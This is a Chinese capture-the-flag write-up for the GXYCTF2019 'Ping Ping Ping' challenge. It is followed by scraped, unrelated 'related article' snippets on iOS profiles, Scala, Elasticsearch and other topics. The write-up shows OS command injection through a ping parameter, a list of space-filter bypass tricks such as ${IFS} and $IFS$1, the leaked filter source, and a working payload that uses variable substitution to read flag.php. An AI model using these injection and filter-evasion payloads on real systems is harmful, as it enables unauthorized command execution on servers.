[GXYCTF2019]Ping Ping Ping解题过程

1、来看看靶场

发现就只有这个提示,尝试一下在url输入框进行测试

 

 页面返回ping的结果,然后我之前也做过另外一道类似的题

链接:[ACTF2020 新生赛]Exec1命令注入_[actf2020 新生赛]exec 1_旺仔Sec的博客-CSDN博客

尝试用管道符

果然是可以的,再尝试一下访问flag.php

 

space应该是空格被过滤了,那我们来进行绕过空格

常用的空格过滤:

  1. ${IFS}替换
  2. $IFS$1替换
  3. ${IFS替换
  4. %20替换
  5. <和<>重定向符替换
  6. %09替换
${IFS}
$IFS$1 
<
<>
{cat,flag.php} 		//用逗号实现空格功能
%09		//需要php环境

但是好像还是没啥用

 那我们访问之前第二个文件,index.php文件试试

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);die("fxck your symbol!");} else if(preg_match("/ /", $ip)){die("fxck your space!");} else if(preg_match("/bash/", $ip)){die("fxck your bash!");} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");}$a = shell_exec("ping -c 4 ".$ip);echo "";print_r($a);
}?>

这里大概是使用正则匹配对参数,例如{},<>,* ,?,空格,bash,flag等进行了过滤,才会有我们刚才看到的各种提示
这里观察到有个a变量,使用shell_exec命令进行了shell命令执行,然后将结果返回到a变量中,最后输出a shell_exec命令,这里的ping -c 4是发送4条请求
那么我们可以利用变量来进行覆盖绕过flag过滤

构造一下payload

/?ip=1;a=g;cat$IFS$1fla$a.php;

 FLAG:“flag{a6e9d752-79bf-43e0-ab8f-f789fba639ae}”

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/254159.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

WebrtcNode, publish-sdp offer 流程(1)

1. AmqpClient - New message received sdp offer 的消息 AmqpClient - RpcServer New message received {method: onTransportSignaling,args: [aa230ce0863e42baa8bae5c14e91e809,{sdp: v0\r\n o- 2367615733001925388 2 IN IP4 127.0.0.1\r\n s-\r\n t0 0\r\n agroup:BUND…

下载描述文件,体验使用 IOS 16 版新特性

简介 最新版本16.0&#xff0c;已经更新&#xff0c;虽然本文针对的是15.4升级&#xff0c;但是操作都是相同的。可以作为参考 温馨提示&#xff1a;大版本体验&#xff0c;一定要保证数据备份&#xff0c;不然有个大BUG的话&#xff0c;数据丢了得不偿失。 最新测试版&…

ios描述文件过期时间查看

这边主要是针对企业证书 以下对生产证书和描述文件过期时间的截图 以下是描述文件查看步骤 只能在苹果电脑查看原先这个包叫xxxx.ipa,要先将后缀改成zip双击这个文件&#xff0c;会生成一个文件夹 点击Payload进去&#xff0c;右键显示包内容找到embedded...bileprovision这…

iOS描述文件设置

iOS 12的某个版本后,iOS证书信任有了一些改动.下面我用Whistle来举个例子. 1. 设置要安装证书的设备的代理与端口 2. 扫码安装证书 其实这一步,扫码安装证书或者是在浏览器地址栏中输入对应的ip地址也是一样的 3. 证书的安装(旧版本这一步做完就能正常使用了) 本节的操作总结成…

iOS 理解证书与描述文件

简单的理一下iOS应用打包用到的Certificate与Provision Profile的关系 1.Certificate ——证书 1.1证书是什么? 百度百科是这么解释的: 由此,知道证书是由权利机关办法的用以证明资格或权利的文件. 1.2 我们向Apple申请证书是在干什么? 我们向Apple申请证书,就是在向权利…

iOS证书和描述文件申请详情步骤

因为之前在iOS开发这条道路上吃了很多不必要的亏&#xff0c;特此想把自己的经验分享给大家&#xff0c;对于初学者来讲不是上架App Store购买一个黑苹果是不划算的&#xff0c;简单的内测或者玩玩完全是浪费钱啊&#xff08;有钱可忽略&#xff09;&#xff0c;特此介绍一个小…

ios14测试版兼容软件,ios14描述文件官方版

ios14描述文件官方版是苹果在全球开发者大会上正式公布的最新版本&#xff0c;也就是iOS14的版本&#xff0c;想要升级的人员可以直接从开发人员中心或者通过系统的推送进行下载&#xff0c;整个申请的流程都和之前的升级没有什么区别&#xff0c;但是系统带来的改变却是显而易…

iOS证书和描述文件申请

首先你需要有一个苹果的 开发者帐号&#xff0c;一个 Mac系统。 如果没有开发者账号&#xff0c;可以先申请一个开发者账号&#xff0c;申请流程详见&#xff1a; iOS公司开发者账号申请教程。 如果你已经有了一个IDP&#xff0c;打开 https://developer.apple.com/account…

ios14测试版兼容软件,ios14描述文件

#ios14描述文件简介 在今天早些时候Apple发布了最新的ios14测试版系统&#xff0c;此次更新也算是一个大版本的更新了&#xff0c;相比ios13来说&#xff0c;ios14在整体的风格变化上并不是很大&#xff0c;主要还是以功能为主&#xff0c;比如小屏的来电显示&#xff0c;画中画…

iOS16 beta8 描述文件官方地址下载

iOS16 Beta8 开发者测试版 iOS16 Beta8版 描述文件下载官方地址&#xff08;需要AppID登录&#xff09; 1&#xff1a;新壁纸增加 本次更新后&#xff0c;家庭应用和车载 CarPlay 新增了一批新的 iOS16 主题壁纸。 2&#xff1a;信息撤回功能增强 现在苹果信息发送后&#x…

Scala初识

1.scala简介 是一种多范式的编程语言&#xff0c;其设计的初衷是要集成面向对象编程和函数式编程的各种特性。Scala运行于Java平台&#xff08;Java虚拟机&#xff09;并兼容现有的Java程序。 scala特点 1.Scala是面向对象的 Scala是一种纯粹的面向对象语言&#xff0c;每一个…

iOS 16描述文件升级方法 iOS 16升级描述文件下载

在6月7日凌晨&#xff0c;iOS 16正式发布了&#xff0c;而升级的方法&#xff0c;有些人准备用描述文件来升级&#xff0c;但不知道具体的升级方法&#xff0c;下面就为大家介绍iOS 16描述文件的具体升级方法。 iOS 16描述文件升级方法 iOS 16升级描述文件下载 一、使用描述文…

IOS项目证书,描述文件等生成和配置 整理

首先得描述一下各个证书的定位&#xff0c;作用&#xff0c;这样在制作的时候心中有谱&#xff0c;对整个流程的把握也会准确一些&#xff1b; 1、开发者证书&#xff08;分为开发和发布两种&#xff0c;类型为ios Development,ios Distribution&#xff09;&#xff0c;这个是…

C++ 遍历算法

&#x1f914;遍历算法&#xff1a; &#x1f642;1.for_each 遍历容器 &#x1f50d;介绍&#xff1a; 在C中&#xff0c;for_each是一个用于遍历容器元素并对它们进行操作的算法。它通常有三个参数&#xff1a; &#x1f4d6;1. 容器的起始位置&#xff08;iterator&am…

layui框架学习(25:弹出层模块_加载框询问框)

layui框架的弹出层模块layer中最重要的函数即layer.open&#xff0c;基于该函数&#xff0c;layer模块封装了很多常用弹出框&#xff0c;上文已介绍了消息框和提示框函数&#xff0c;本文学习加载框和询问框函数的基本用法&#xff0c;同时继续学习layer模块中基础参数的用法。…

【SpringCloud——Elasticsearch(上)】

一、什么是Elasticsearch elasticsearch是一款非常强大的开源搜索引擎&#xff0c;可以帮助我们从海量数据中快速找到需要的内容。 二、倒排索引 1、正向索引 2、倒排索引 3、总结 三、ES和MySQL的区别 四、操作索引库 1、基于Kibana&#xff08;WEB界面&#xff09; 以下操作…

代码随想录算法训练营第五十七天 | 回文

647. 回文子串 文档讲解&#xff1a;代码随想录 (programmercarl.com) 视频讲解&#xff1a;动态规划&#xff0c;字符串性质决定了DP数组的定义 | LeetCode&#xff1a;647.回文子串_哔哩哔哩_bilibili 状态&#xff1a;不会做。 思路 确定dp数组&#xff08;dp table&#xf…

驱动LSM6DS3TR-C实现高效运动检测与数据采集(3)----获取ID

概述 一旦传感器被正确初始化&#xff0c;可以通过SPI或I2C接口向传感器发送读取命令&#xff0c;并接收传感器返回的数据。这个读取过程包括获取LSM6DS3TR传感器提供的加速度计和陀螺仪数据&#xff0c;以及传感器对应的温度信息。 获取数据状态 STATUS_REG (1Eh)是该传感器…

chatgpt赋能python:Python中构造方法的介绍与应用

Python中构造方法的介绍与应用 在Python编程语言中&#xff0c;构造方法通常是类中的一个特殊方法&#xff0c;用于在对象创建时初始化其属性。构造方法使用__init__关键字来定义&#xff0c;而且通常会包含self参数&#xff0c;用于引用创建的新对象。在本文中&#xff0c;我…

木工专用计算机,木工做多功能电脑台带书柜架一体图片 自己打造电脑桌用实木还是生态木颗粒板...

黑色十字条纹状的书架&#xff0c;给人带来一种与众不同的感觉&#xff0c;褐色的实木地板铺贴在地面上&#xff0c;褐色的地面与整个橱柜形成了鲜明的对比。褐色给人一种灰溜溜的感觉&#xff0c;但是这种颜色很有古典美&#xff0c;而且褐色的地面又特别的耐脏&#xff0c;这…